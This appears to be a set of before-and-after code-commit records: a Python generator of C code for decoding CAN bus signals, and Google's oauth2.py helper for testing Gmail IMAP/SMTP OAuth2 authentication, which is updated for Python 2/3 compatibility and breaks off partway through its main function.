mydata.moving_average(n=10001)
plot(mydata.df["pos"], mydata.df["ma"], label="w10001")
mydata.moving_average(n=20001)
plot(mydata.df["pos"], mydata.df["ma"], label="w20001")
mydata.moving_average(n=30001)
plot(mydata.df["pos"], mydata.df["ma"], label="w30001")
legend()
|
#!/usr/bin/env python
from collections import defaultdict
import sys
import struct
import argparse
# XXXX UGGGGGG Hack because this code is stupid.
# XXXX Should really just parse XML into some intermediate structure and then
# XXXX generate hex, code, etc. all from that format.
id_mapping = {}
# XXXX End ugly hack.
def parse_options():
parser = argparse.ArgumentParser(description="Generate C source code from "
"CAN signal descriptions in JSON or hex")
hex_arg = parser.add_argument("-x", "--hex",
action="store",
dest="hex_file",
metavar="FILE",
help="generate source from this hex file")
parser.add_argument("-j", "--json",
action="append",
type=str,
nargs='*',
dest="json_files",
metavar="FILE",
help="generate source from this JSON file")
parser.add_argument('-p', '--priority',
action='append',
nargs='*',
type=int,
help='Ordered list of prioritized messages.')
arguments = parser.parse_args()
# Flatten the priority list.
arguments.priority = arguments.priority or []
if len(arguments.priority) > 0:
arguments.priority = [item for sublist in arguments.priority
for item in sublist]
if arguments.hex_file and arguments.json_files:
raise argparse.ArgumentError(hex_arg,
"Can't specify both a hex and JSON file -- pick one!")
if not arguments.hex_file and not arguments.json_files:
raise argparse.ArgumentError(hex_arg,
"Must specify either a hex file or JSON file.")
return arguments
class Signal(object):
def __init__(self, id, name, generic_name, position, length, factor=1,
offset=0, value_handler=None, states=None):
self.id = id
self.name = name
self.generic_name = generic_name
self.position = position
self.length = length
self.factor = factor
self.offset = offset
self.value_handler = value_handler
self.array_index = 0
self.states = states or []
def __str__(self):
result = "{%d, \"%s\", %s, %d, %f, %f" % (
self.id, self.generic_name, self.position, self.length,
self.factor, self.offset)
if len(self.states) > 0:
result += ", SIGNAL_STATES[%d], %d" % (self.id, len(self.states))
result += "}, // %s" % self.name
return result
class SignalState(object):
def __init__(self, value, name):
self.value = value
self.name = name
def __str__(self):
return "{%d, \"%s\"}" % (self.value, self.name)
class Parser(object):
def __init__(self, priority):
self.messages = defaultdict(list)
self.message_ids = []
self.signal_count = 0
self.priority = priority
def parse(self):
raise NotImplementedError
def print_header(self):
print "#include \"canutil.h\"\n"
print "void decodeCanMessage(int id, uint8_t* data) {"
def print_source(self):
self.print_header()
# TODO need to handle signals with more than 10 states
print " CanSignalState SIGNAL_STATES[%d][%d] = {" % (
self.signal_count, 10)
for signals in self.messages.values():
for signal in signals:
if len(signal.states) > 0:
print " {",
for state in signal.states:
print "%s," % state,
print "},"
print " };"
print " CanSignal SIGNALS[%d] = {" % self.signal_count
i = 1
for signals in self.messages.values():
for signal in signals:
signal.array_index = i - 1
print " %s" % signal
i += 1
print " };"
print " switch (id) {"
for message_id, signals in self.messages.iteritems():
print " case 0x%x:" % message_id
for signal in signals:
if signal.value_handler:
print (" extern %s("
"CanSignal*, CanSignal*, float);" %
signal.value_handler)
print (" translateCanSignal(&SIGNALS[%d], "
"data, &%s, SIGNALS);" % (
signal.array_index, signal.value_handler))
else:
print " translateCanSignal(&SIGNALS[%d], data, SIGNALS);" % (
signal.array_index)
print " break;"
print " }"
print "}\n"
# Create a set of filters.
self.print_filters()
def print_filters(self):
priority_ids = [id_mapping[p] for p in self.priority if p in id_mapping]
remaining_ids = [i for i in self.message_ids if i not in priority_ids]
all_ids = priority_ids + remaining_ids
# TODO These cast a really wide net
masks = [(0, 0x7ff),
(1, 0x7ff),
(2, 0x7ff),
(3, 0x7ff)]
# These arrays can't be initialized when we create the variables or else
# they end up in the .data portion of the compiled program, and it
# becomes too big for the microcontroller. Initializing them at runtime
# gets around that problem.
print "int FILTER_MASK_COUNT = %d;" % len(masks)
print "CanFilterMask FILTER_MASKS[%d];" % len(masks)
print "int FILTER_COUNT = %d;" % len(all_ids)
print "CanFilter FILTERS[%d];" % len(all_ids)
print
print "CanFilterMask* initializeFilterMasks() {"
print "Serial.println(\"Initializing filter arrays...\");"
print " FILTER_MASKS = {"
for i, mask in enumerate(masks):
print " {%d, 0x%x}," % mask
print " };"
print " return FILTER_MASKS;"
print "}"
print
print "CanFilter* initializeFilters() {"
print "Serial.println(\"Initializing filters...\");"
print " FILTERS = {"
for i, can_filter in enumerate(all_ids):
# TODO be super smart and figure out good mask values dynamically
print " {%d, 0x%x, %d, %d}," % (i, can_filter, 1, 0)
print " };"
print " return FILTERS;"
print "}"
class HexParser(Parser):
def __init__(self, filename, priority):
super(HexParser, self).__init__(priority)
import intelhex
self.mem = intelhex.IntelHex(filename)
def parse(self):
hex_offset = 1
while hex_offset < len(self.mem):
(message_id, num) = struct.unpack('<HB',
self.mem.gets(hex_offset, 3))
self.message_ids.append(message_id)
hex_offset += 3
for i in range(num):
hex_offset, signal = self.parse_signal(message_id, hex_offset)
self.signal_count += 1
self.messages[message_id].append(signal)
def parse_signal(self, message_id, hex_offset):
(signal_id, t_pos, length) = struct.unpack('<BBB',
self.mem.gets(hex_offset, 3))
hex_offset += 3
position = t_pos & ~(1 << 7)
transform = (t_pos & 1 << 7) != 0
if transform:
(offset, factor) = struct.unpack('<ff',
self.mem.gets(hex_offset, 8))
hex_offset += 8
else:
(offset, factor) = (0.0, 1.0)
id_mapping[signal_id] = message_id
return hex_offset, Signal(signal_id, "", "", position, length, factor,
offset)
class JsonParser(Parser):
def __init__(self, filenames, priority):
super(JsonParser, self).__init__(priority)
self.jsonFiles = filenames
# The JSON parser accepts the format specified in the README.
def parse(self):
import json
for filename in self.jsonFiles:
with open(filename[0]) as jsonFile:
self.data = json.load(jsonFile)
for message in self.data['messages'].values():
self.message_ids.append(message['id'])
self.signal_count += len(message['signals'])
for signal in message['signals']:
states = [SignalState(value, name)
for name, value in signal.get('states',
{}).iteritems()]
# TODO we're keeping the numerical ID here even though
# we're not using it now because it will make switching
# to it in the future easier
self.messages[message['id']].append(
Signal(signal.get('id', 0),
signal['name'],
signal['generic_name'],
signal['bit_position'],
signal['bit_size'],
signal.get('factor', 1),
signal.get('offset', 0),
signal.get('value_handler', None),
states))
def main():
arguments = parse_options()
if arguments.hex_file:
parser = HexParser(arguments.hex_file, arguments.priority)
else:
parser = JsonParser(arguments.json_files, arguments.priority)
parser.parse()
parser.print_source()
if __name__ == "__main__":
sys.exit(main())
Remove unused priority argument.
#!/usr/bin/env python
from collections import defaultdict
import sys
import struct
import argparse
def parse_options():
parser = argparse.ArgumentParser(description="Generate C source code from "
"CAN signal descriptions in JSON or hex")
hex_arg = parser.add_argument("-x", "--hex",
action="store",
dest="hex_file",
metavar="FILE",
help="generate source from this hex file")
parser.add_argument("-j", "--json",
action="append",
type=str,
nargs='*',
dest="json_files",
metavar="FILE",
help="generate source from this JSON file")
arguments = parser.parse_args()
if arguments.hex_file and arguments.json_files:
raise argparse.ArgumentError(hex_arg,
"Can't specify both a hex and JSON file -- pick one!")
if not arguments.hex_file and not arguments.json_files:
raise argparse.ArgumentError(hex_arg,
"Must specify either a hex file or JSON file.")
return arguments
class Signal(object):
def __init__(self, id, name, generic_name, position, length, factor=1,
offset=0, value_handler=None, states=None):
self.id = id
self.name = name
self.generic_name = generic_name
self.position = position
self.length = length
self.factor = factor
self.offset = offset
self.value_handler = value_handler
self.array_index = 0
self.states = states or []
def __str__(self):
result = "{%d, \"%s\", %s, %d, %f, %f" % (
self.id, self.generic_name, self.position, self.length,
self.factor, self.offset)
if len(self.states) > 0:
result += ", SIGNAL_STATES[%d], %d" % (self.id, len(self.states))
result += "}, // %s" % self.name
return result
class SignalState(object):
def __init__(self, value, name):
self.value = value
self.name = name
def __str__(self):
return "{%d, \"%s\"}" % (self.value, self.name)
class Parser(object):
def __init__(self):
self.messages = defaultdict(list)
self.message_ids = []
self.id_mapping = {}
self.signal_count = 0
def parse(self):
raise NotImplementedError
def print_header(self):
print "#include \"canutil.h\"\n"
print "void decodeCanMessage(int id, uint8_t* data) {"
def print_source(self):
self.print_header()
# TODO need to handle signals with more than 10 states
print " CanSignalState SIGNAL_STATES[%d][%d] = {" % (
self.signal_count, 10)
for signals in self.messages.values():
for signal in signals:
if len(signal.states) > 0:
print " {",
for state in signal.states:
print "%s," % state,
print "},"
print " };"
print " CanSignal SIGNALS[%d] = {" % self.signal_count
i = 1
for signals in self.messages.values():
for signal in signals:
signal.array_index = i - 1
print " %s" % signal
i += 1
print " };"
print " switch (id) {"
for message_id, signals in self.messages.iteritems():
print " case 0x%x:" % message_id
for signal in signals:
if signal.value_handler:
print (" extern %s("
"CanSignal*, CanSignal*, float);" %
signal.value_handler)
print (" translateCanSignal(&SIGNALS[%d], "
"data, &%s, SIGNALS);" % (
signal.array_index, signal.value_handler))
else:
print " translateCanSignal(&SIGNALS[%d], data, SIGNALS);" % (
signal.array_index)
print " break;"
print " }"
print "}\n"
# Create a set of filters.
self.print_filters()
def print_filters(self):
# TODO These cast a really wide net
masks = [(0, 0x7ff),
(1, 0x7ff),
(2, 0x7ff),
(3, 0x7ff)]
# These arrays can't be initialized when we create the variables or else
# they end up in the .data portion of the compiled program, and it
# becomes too big for the microcontroller. Initializing them at runtime
# gets around that problem.
print "int FILTER_MASK_COUNT = %d;" % len(masks)
print "CanFilterMask FILTER_MASKS[%d];" % len(masks)
print "int FILTER_COUNT = %d;" % len(self.message_ids)
print "CanFilter FILTERS[%d];" % len(self.message_ids)
print
print "CanFilterMask* initializeFilterMasks() {"
print "Serial.println(\"Initializing filter arrays...\");"
print " FILTER_MASKS = {"
for i, mask in enumerate(masks):
print " {%d, 0x%x}," % mask
print " };"
print " return FILTER_MASKS;"
print "}"
print
print "CanFilter* initializeFilters() {"
print "Serial.println(\"Initializing filters...\");"
print " FILTERS = {"
for i, can_filter in enumerate(self.message_ids):
# TODO be super smart and figure out good mask values dynamically
print " {%d, 0x%x, %d, %d}," % (i, can_filter, 1, 0)
print " };"
print " return FILTERS;"
print "}"
class HexParser(Parser):
def __init__(self, filename):
super(HexParser, self).__init__()
import intelhex
self.mem = intelhex.IntelHex(filename)
def parse(self):
hex_offset = 1
while hex_offset < len(self.mem):
(message_id, num) = struct.unpack('<HB',
self.mem.gets(hex_offset, 3))
self.message_ids.append(message_id)
hex_offset += 3
for i in range(num):
hex_offset, signal = self.parse_signal(message_id, hex_offset)
self.signal_count += 1
self.messages[message_id].append(signal)
def parse_signal(self, message_id, hex_offset):
(signal_id, t_pos, length) = struct.unpack('<BBB',
self.mem.gets(hex_offset, 3))
hex_offset += 3
position = t_pos & ~(1 << 7)
transform = (t_pos & 1 << 7) != 0
if transform:
(offset, factor) = struct.unpack('<ff',
self.mem.gets(hex_offset, 8))
hex_offset += 8
else:
(offset, factor) = (0.0, 1.0)
self.id_mapping[signal_id] = message_id
return hex_offset, Signal(signal_id, "", "", position, length, factor,
offset)
class JsonParser(Parser):
def __init__(self, filenames):
super(JsonParser, self).__init__()
self.jsonFiles = filenames
# The JSON parser accepts the format specified in the README.
def parse(self):
import json
for filename in self.jsonFiles:
with open(filename[0]) as jsonFile:
self.data = json.load(jsonFile)
for message in self.data['messages'].values():
self.message_ids.append(message['id'])
self.signal_count += len(message['signals'])
for signal in message['signals']:
states = [SignalState(value, name)
for name, value in signal.get('states',
{}).iteritems()]
# TODO we're keeping the numerical ID here even though
# we're not using it now because it will make switching
# to it in the future easier
self.messages[message['id']].append(
Signal(signal.get('id', 0),
signal['name'],
signal['generic_name'],
signal['bit_position'],
signal['bit_size'],
signal.get('factor', 1),
signal.get('offset', 0),
signal.get('value_handler', None),
states))
def main():
arguments = parse_options()
if arguments.hex_file:
parser = HexParser(arguments.hex_file)
else:
parser = JsonParser(arguments.json_files)
parser.parse()
parser.print_source()
if __name__ == "__main__":
sys.exit(main())
|
#!/usr/bin/env python
#
# Copyright 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Performs client tasks for testing IMAP OAuth2 authentication.
To use this script, you'll need to have registered with Google as an OAuth
application and obtained an OAuth client ID and client secret.
See https://developers.google.com/identity/protocols/OAuth2 for instructions on
registering and for documentation of the APIs invoked by this code.
This script has 3 modes of operation.
1. The first mode is used to generate and authorize an OAuth2 token, the
first step in logging in via OAuth2.
oauth2 --user=xxx@gmail.com \
--client_id=1038[...].apps.googleusercontent.com \
--client_secret=VWFn8LIKAMC-MsjBMhJeOplZ \
--generate_oauth2_token
The script will converse with Google and generate an oauth request
token, then present you with a URL you should visit in your browser to
authorize the token. Once you get the verification code from the Google
website, enter it into the script to get your OAuth access token. The output
from this command will contain the access token, a refresh token, and some
metadata about the tokens. The access token can be used until it expires, and
the refresh token lasts indefinitely, so you should record these values for
reuse.
2. The script will generate new access tokens using a refresh token.
oauth2 --user=xxx@gmail.com \
--client_id=1038[...].apps.googleusercontent.com \
--client_secret=VWFn8LIKAMC-MsjBMhJeOplZ \
--refresh_token=1/Yzm6MRy4q1xi7Dx2DuWXNgT6s37OrP_DW_IoyTum4YA
3. The script will generate an OAuth2 string that can be fed
directly to IMAP or SMTP. This is triggered with the --generate_oauth2_string
option.
oauth2 --generate_oauth2_string --user=xxx@gmail.com \
--access_token=ya29.AGy[...]ezLg
The output of this mode will be a base64-encoded string. To use it, connect to a
IMAPFE and pass it as the second argument to the AUTHENTICATE command.
a AUTHENTICATE XOAUTH2 a9sha9sfs[...]9dfja929dk==
"""
from __future__ import print_function
from future.utils import iteritems
from builtins import input
import base64
import imaplib
import json
from optparse import OptionParser
import smtplib
import sys
try:
# Python 2.X
from urllib import quote as urllib_quote
from urllib import unquote as urllib_unquote
from urllib import urlencode as urllib_urlencode
from urllib2 import urlopen as urllib_urlopen
except ImportError:
# Python 3+
from urllib.parse import quote as urllib_quote
from urllib.parse import unquote as urllib_unquote
from urllib.parse import urlencode as urllib_urlencode
from urllib.request import urlopen as urllib_urlopen
def SetupOptionParser():
# Usage message is the module's docstring.
parser = OptionParser(usage=__doc__)
parser.add_option('--generate_oauth2_token',
action='store_true',
dest='generate_oauth2_token',
help='generates an OAuth2 token for testing')
parser.add_option('--generate_oauth2_string',
action='store_true',
dest='generate_oauth2_string',
help='generates an initial client response string for '
'OAuth2')
parser.add_option('--client_id',
default=None,
help='Client ID of the application that is authenticating. '
'See OAuth2 documentation for details.')
parser.add_option('--client_secret',
default=None,
help='Client secret of the application that is '
'authenticating. See OAuth2 documentation for '
'details.')
parser.add_option('--access_token',
default=None,
help='OAuth2 access token')
parser.add_option('--refresh_token',
default=None,
help='OAuth2 refresh token')
parser.add_option('--scope',
default='https://mail.google.com/',
help='scope for the access token. Multiple scopes can be '
'listed separated by spaces with the whole argument '
'quoted.')
parser.add_option('--test_imap_authentication',
action='store_true',
dest='test_imap_authentication',
help='attempts to authenticate to IMAP')
parser.add_option('--test_smtp_authentication',
action='store_true',
dest='test_smtp_authentication',
help='attempts to authenticate to SMTP')
parser.add_option('--user',
default=None,
help='email address of user whose account is being '
'accessed')
return parser
# The URL root for accessing Google Accounts.
GOOGLE_ACCOUNTS_BASE_URL = 'https://accounts.google.com'
# Hardcoded dummy redirect URI for non-web apps.
REDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'
def AccountsUrl(command):
"""Generates the Google Accounts URL.
Args:
command: The command to execute.
Returns:
A URL for the given command.
"""
return '%s/%s' % (GOOGLE_ACCOUNTS_BASE_URL, command)
def UrlEscape(text):
# See OAUTH 5.1 for a definition of which characters need to be escaped.
return urllib_quote(text, safe='~-._')
def UrlUnescape(text):
# See OAUTH 5.1 for a definition of which characters need to be escaped.
return urllib_unquote(text)
def FormatUrlParams(params):
"""Formats parameters into a URL query string.
Args:
params: A key-value map.
Returns:
A URL query string version of the given parameters.
"""
param_fragments = []
for param in sorted(iteritems(params), key=lambda x: x[0]):
param_fragments.append('%s=%s' % (param[0], UrlEscape(param[1])))
return '&'.join(param_fragments)
def GeneratePermissionUrl(client_id, scope='https://mail.google.com/'):
"""Generates the URL for authorizing access.
This uses the "OAuth2 for Installed Applications" flow described at
https://developers.google.com/accounts/docs/OAuth2InstalledApp
Args:
client_id: Client ID obtained by registering your app.
scope: scope for access token, e.g. 'https://mail.google.com'
Returns:
A URL that the user should visit in their browser.
"""
params = {}
params['client_id'] = client_id
params['redirect_uri'] = REDIRECT_URI
params['scope'] = scope
params['response_type'] = 'code'
return '%s?%s' % (AccountsUrl('o/oauth2/auth'),
FormatUrlParams(params))
def AuthorizeTokens(client_id, client_secret, authorization_code):
"""Obtains OAuth access token and refresh token.
This uses the application portion of the "OAuth2 for Installed Applications"
flow at https://developers.google.com/accounts/docs/OAuth2InstalledApp#handlingtheresponse
Args:
client_id: Client ID obtained by registering your app.
client_secret: Client secret obtained by registering your app.
authorization_code: code generated by Google Accounts after user grants
permission.
Returns:
The decoded response from the Google Accounts server, as a dict. Expected
fields include 'access_token', 'expires_in', and 'refresh_token'.
"""
params = {}
params['client_id'] = client_id
params['client_secret'] = client_secret
params['code'] = authorization_code
params['redirect_uri'] = REDIRECT_URI
params['grant_type'] = 'authorization_code'
request_url = AccountsUrl('o/oauth2/token')
response = urllib_urlopen(request_url, urllib_urlencode(params)).read()
return json.loads(response)
def RefreshToken(client_id, client_secret, refresh_token):
"""Obtains a new token given a refresh token.
See https://developers.google.com/accounts/docs/OAuth2InstalledApp#refresh
Args:
client_id: Client ID obtained by registering your app.
client_secret: Client secret obtained by registering your app.
refresh_token: A previously-obtained refresh token.
Returns:
The decoded response from the Google Accounts server, as a dict. Expected
fields include 'access_token', 'expires_in', and 'refresh_token'.
"""
params = {}
params['client_id'] = client_id
params['client_secret'] = client_secret
params['refresh_token'] = refresh_token
params['grant_type'] = 'refresh_token'
request_url = AccountsUrl('o/oauth2/token')
response = urllib_urlopen(request_url, urllib_urlencode(params)).read()
return json.loads(response)
def GenerateOAuth2String(username, access_token, base64_encode=True):
"""Generates an IMAP OAuth2 authentication string.
See https://developers.google.com/google-apps/gmail/oauth2_overview
Args:
username: the username (email address) of the account to authenticate
access_token: An OAuth2 access token.
base64_encode: Whether to base64-encode the output.
Returns:
The SASL argument for the OAuth2 mechanism.
"""
auth_string = 'user=%s\1auth=Bearer %s\1\1' % (username, access_token)
if base64_encode:
auth_string = base64.b64encode(auth_string)
return auth_string
def TestImapAuthentication(user, auth_string):
"""Authenticates to IMAP with the given auth_string.
Prints a debug trace of the attempted IMAP connection.
Args:
user: The Gmail username (full email address)
auth_string: A valid OAuth2 string, as returned by GenerateOAuth2String.
Must not be base64-encoded, since imaplib does its own base64-encoding.
"""
print
imap_conn = imaplib.IMAP4_SSL('imap.gmail.com')
imap_conn.debug = 4
imap_conn.authenticate('XOAUTH2', lambda x: auth_string)
imap_conn.select('INBOX')
def TestSmtpAuthentication(user, auth_string):
"""Authenticates to SMTP with the given auth_string.
Args:
user: The Gmail username (full email address)
auth_string: A valid OAuth2 string, not base64-encoded, as returned by
GenerateOAuth2String.
"""
print
smtp_conn = smtplib.SMTP('smtp.gmail.com', 587)
smtp_conn.set_debuglevel(True)
smtp_conn.ehlo('test')
smtp_conn.starttls()
smtp_conn.docmd('AUTH', 'XOAUTH2 ' + base64.b64encode(auth_string))
def RequireOptions(options, *args):
missing = [arg for arg in args if getattr(options, arg) is None]
if missing:
print('Missing options: %s' % ' '.join(missing))
sys.exit(-1)
def main(argv):
options_parser = SetupOptionParser()
(options, args) = options_parser.parse_args()
if options.refresh_token:
RequireOptions(options, 'client_id', 'client_secret')
response = RefreshToken(options.client_id, options.client_secret,
options.refresh_token)
print('Access Token: %s' % response['access_token'])
print('Access Token Expiration Seconds: %s' % response['expires_in'])
elif options.generate_oauth2_string:
RequireOptions(options, 'user', 'access_token')
print ('OAuth2 argument:\n' +
GenerateOAuth2String(options.user, options.access_token))
elif options.generate_oauth2_token:
RequireOptions(options, 'client_id', 'client_secret')
print('To authorize token, visit this url and follow the directions:')
print(' %s' % GeneratePermissionUrl(options.client_id, options.scope))
authorization_code = input('Enter verification code: ')
response = AuthorizeTokens(options.client_id, options.client_secret,
authorization_code)
print('Refresh Token: %s' % response['refresh_token'])
print('Access Token: %s' % response['access_token'])
print('Access Token Expiration Seconds: %s' % response['expires_in'])
elif options.test_imap_authentication:
RequireOptions(options, 'user', 'access_token')
TestImapAuthentication(options.user,
GenerateOAuth2String(options.user, options.access_token,
base64_encode=False))
elif options.test_smtp_authentication:
RequireOptions(options, 'user', 'access_token')
TestSmtpAuthentication(options.user,
GenerateOAuth2String(options.user, options.access_token,
base64_encode=False))
else:
options_parser.print_help()
print('Nothing to do, exiting.')
return
if __name__ == '__main__':
main(sys.argv)
Python 2/3 compatibility: strings and bytes
#!/usr/bin/env python
#
# Copyright 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Performs client tasks for testing IMAP OAuth2 authentication.
To use this script, you'll need to have registered with Google as an OAuth
application and obtained an OAuth client ID and client secret.
See https://developers.google.com/identity/protocols/OAuth2 for instructions on
registering and for documentation of the APIs invoked by this code.
This script has 3 modes of operation.
1. The first mode is used to generate and authorize an OAuth2 token, the
first step in logging in via OAuth2.
oauth2 --user=xxx@gmail.com \
--client_id=1038[...].apps.googleusercontent.com \
--client_secret=VWFn8LIKAMC-MsjBMhJeOplZ \
--generate_oauth2_token
The script will converse with Google and generate an oauth request
token, then present you with a URL you should visit in your browser to
authorize the token. Once you get the verification code from the Google
website, enter it into the script to get your OAuth access token. The output
from this command will contain the access token, a refresh token, and some
metadata about the tokens. The access token can be used until it expires, and
the refresh token lasts indefinitely, so you should record these values for
reuse.
2. The script will generate new access tokens using a refresh token.
oauth2 --user=xxx@gmail.com \
--client_id=1038[...].apps.googleusercontent.com \
--client_secret=VWFn8LIKAMC-MsjBMhJeOplZ \
--refresh_token=1/Yzm6MRy4q1xi7Dx2DuWXNgT6s37OrP_DW_IoyTum4YA
3. The script will generate an OAuth2 string that can be fed
directly to IMAP or SMTP. This is triggered with the --generate_oauth2_string
option.
oauth2 --generate_oauth2_string --user=xxx@gmail.com \
--access_token=ya29.AGy[...]ezLg
The output of this mode will be a base64-encoded string. To use it, connect to a
IMAPFE and pass it as the second argument to the AUTHENTICATE command.
a AUTHENTICATE XOAUTH2 a9sha9sfs[...]9dfja929dk==
"""
from __future__ import print_function
from future.utils import iteritems
from builtins import input
import base64
import imaplib
import json
from optparse import OptionParser
import smtplib
import sys
# urllib Python 2/3 compatible code.
# urllib2 provides some extra functionality, namely the urlopen() function
# can allow you to specify headers.
# See: https://stackoverflow.com/a/2018074
try:
# Python 2.X
from urllib import quote as urllib_quote
from urllib import unquote as urllib_unquote
from urllib import urlencode as urllib_urlencode
from urllib2 import urlopen as urllib_urlopen
except ImportError:
# Python 3+
from urllib.parse import quote as urllib_quote
from urllib.parse import unquote as urllib_unquote
from urllib.parse import urlencode as urllib_urlencode
from urllib.request import urlopen as urllib_urlopen
def SetupOptionParser():
# Usage message is the module's docstring.
parser = OptionParser(usage=__doc__)
parser.add_option('--generate_oauth2_token',
action='store_true',
dest='generate_oauth2_token',
help='generates an OAuth2 token for testing')
parser.add_option('--generate_oauth2_string',
action='store_true',
dest='generate_oauth2_string',
help='generates an initial client response string for '
'OAuth2')
parser.add_option('--client_id',
default=None,
help='Client ID of the application that is authenticating. '
'See OAuth2 documentation for details.')
parser.add_option('--client_secret',
default=None,
help='Client secret of the application that is '
'authenticating. See OAuth2 documentation for '
'details.')
parser.add_option('--access_token',
default=None,
help='OAuth2 access token')
parser.add_option('--refresh_token',
default=None,
help='OAuth2 refresh token')
parser.add_option('--scope',
default='https://mail.google.com/',
help='scope for the access token. Multiple scopes can be '
'listed separated by spaces with the whole argument '
'quoted.')
parser.add_option('--test_imap_authentication',
action='store_true',
dest='test_imap_authentication',
help='attempts to authenticate to IMAP')
parser.add_option('--test_smtp_authentication',
action='store_true',
dest='test_smtp_authentication',
help='attempts to authenticate to SMTP')
parser.add_option('--user',
default=None,
help='email address of user whose account is being '
'accessed')
return parser
# The URL root for accessing Google Accounts.
GOOGLE_ACCOUNTS_BASE_URL = 'https://accounts.google.com'
# Hardcoded dummy redirect URI for non-web apps.
REDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'
def AccountsUrl(command):
"""Generates the Google Accounts URL.
Args:
command: The command to execute.
Returns:
A URL for the given command.
"""
return '%s/%s' % (GOOGLE_ACCOUNTS_BASE_URL, command)
def UrlEscape(text):
# See OAUTH 5.1 for a definition of which characters need to be escaped.
return urllib_quote(text, safe='~-._')
def UrlUnescape(text):
# See OAUTH 5.1 for a definition of which characters need to be escaped.
return urllib_unquote(text)
def FormatUrlParams(params):
"""Formats parameters into a URL query string.
Args:
params: A key-value map.
Returns:
A URL query string version of the given parameters.
"""
param_fragments = []
for param in sorted(iteritems(params), key=lambda x: x[0]):
param_fragments.append('%s=%s' % (param[0], UrlEscape(param[1])))
return '&'.join(param_fragments)
def GeneratePermissionUrl(client_id, scope='https://mail.google.com/'):
"""Generates the URL for authorizing access.
This uses the "OAuth2 for Installed Applications" flow described at
https://developers.google.com/accounts/docs/OAuth2InstalledApp
Args:
client_id: Client ID obtained by registering your app.
scope: scope for access token, e.g. 'https://mail.google.com'
Returns:
A URL that the user should visit in their browser.
"""
params = {}
params['client_id'] = client_id
params['redirect_uri'] = REDIRECT_URI
params['scope'] = scope
params['response_type'] = 'code'
return '%s?%s' % (AccountsUrl('o/oauth2/auth'),
FormatUrlParams(params))
def AuthorizeTokens(client_id, client_secret, authorization_code):
"""Obtains OAuth access token and refresh token.
This uses the application portion of the "OAuth2 for Installed Applications"
flow at https://developers.google.com/accounts/docs/OAuth2InstalledApp#handlingtheresponse
Args:
client_id: Client ID obtained by registering your app.
client_secret: Client secret obtained by registering your app.
authorization_code: code generated by Google Accounts after user grants
permission.
Returns:
The decoded response from the Google Accounts server, as a dict. Expected
fields include 'access_token', 'expires_in', and 'refresh_token'.
"""
params = {}
params['client_id'] = client_id
params['client_secret'] = client_secret
params['code'] = authorization_code
params['redirect_uri'] = REDIRECT_URI
params['grant_type'] = 'authorization_code'
request_url = AccountsUrl('o/oauth2/token')
response = urllib_urlopen(request_url, urllib_urlencode(params).encode("utf-8")).read()
return json.loads(response.decode('utf-8'))
def RefreshToken(client_id, client_secret, refresh_token):
"""Obtains a new token given a refresh token.
See https://developers.google.com/accounts/docs/OAuth2InstalledApp#refresh
Args:
client_id: Client ID obtained by registering your app.
client_secret: Client secret obtained by registering your app.
refresh_token: A previously-obtained refresh token.
Returns:
The decoded response from the Google Accounts server, as a dict. Expected
fields include 'access_token', 'expires_in', and 'refresh_token'.
"""
params = {}
params['client_id'] = client_id
params['client_secret'] = client_secret
params['refresh_token'] = refresh_token
params['grant_type'] = 'refresh_token'
request_url = AccountsUrl('o/oauth2/token')
response = urllib_urlopen(request_url, urllib_urlencode(params).encode("utf-8")).read()
return json.loads(response.decode('utf-8'))
def GenerateOAuth2String(username, access_token, base64_encode=True):
"""Generates an IMAP OAuth2 authentication string.
See https://developers.google.com/google-apps/gmail/oauth2_overview
Args:
username: the username (email address) of the account to authenticate
access_token: An OAuth2 access token.
base64_encode: Whether to base64-encode the output.
Returns:
The SASL argument for the OAuth2 mechanism.
"""
auth_string = 'user=%s\1auth=Bearer %s\1\1' % (username, access_token)
if base64_encode:
# encode auth_string in a byte stream
# and then decode the returned bytes in a string
auth_string = base64.b64encode(auth_string.encode()).decode()
return auth_string
def TestImapAuthentication(user, auth_string):
"""Authenticates to IMAP with the given auth_string.
Prints a debug trace of the attempted IMAP connection.
Args:
user: The Gmail username (full email address)
auth_string: A valid OAuth2 string, as returned by GenerateOAuth2String.
Must not be base64-encoded, since imaplib does its own base64-encoding.
"""
print
imap_conn = imaplib.IMAP4_SSL('imap.gmail.com')
imap_conn.debug = 4
imap_conn.authenticate('XOAUTH2', lambda x: auth_string)
imap_conn.select('INBOX')
def TestSmtpAuthentication(user, auth_string):
"""Authenticates to SMTP with the given auth_string.
Args:
user: The Gmail username (full email address)
auth_string: A valid OAuth2 string, not base64-encoded, as returned by
GenerateOAuth2String.
"""
print
smtp_conn = smtplib.SMTP('smtp.gmail.com', 587)
smtp_conn.set_debuglevel(True)
smtp_conn.ehlo('test')
smtp_conn.starttls()
smtp_conn.docmd('AUTH', 'XOAUTH2 ' + base64.b64encode(auth_string))
def RequireOptions(options, *args):
missing = [arg for arg in args if getattr(options, arg) is None]
if missing:
print('Missing options: %s' % ' '.join(missing))
sys.exit(-1)
def main(argv):
options_parser = SetupOptionParser()
(options, args) = options_parser.parse_args()
if options.refresh_token:
RequireOptions(options, 'client_id', 'client_secret')
response = RefreshToken(options.client_id, options.client_secret,
options.refresh_token)
print('Access Token: %s' % response['access_token'])
print('Access Token Expiration Seconds: %s' % response['expires_in'])
elif options.generate_oauth2_string:
RequireOptions(options, 'user', 'access_token')
print ('OAuth2 argument:\n' +
GenerateOAuth2String(options.user, options.access_token))
elif options.generate_oauth2_token:
RequireOptions(options, 'client_id', 'client_secret')
print('To authorize token, visit this url and follow the directions:')
print(' %s' % GeneratePermissionUrl(options.client_id, options.scope))
authorization_code = input('Enter verification code: ')
response = AuthorizeTokens(options.client_id, options.client_secret,
authorization_code)
print('Refresh Token: %s' % response['refresh_token'])
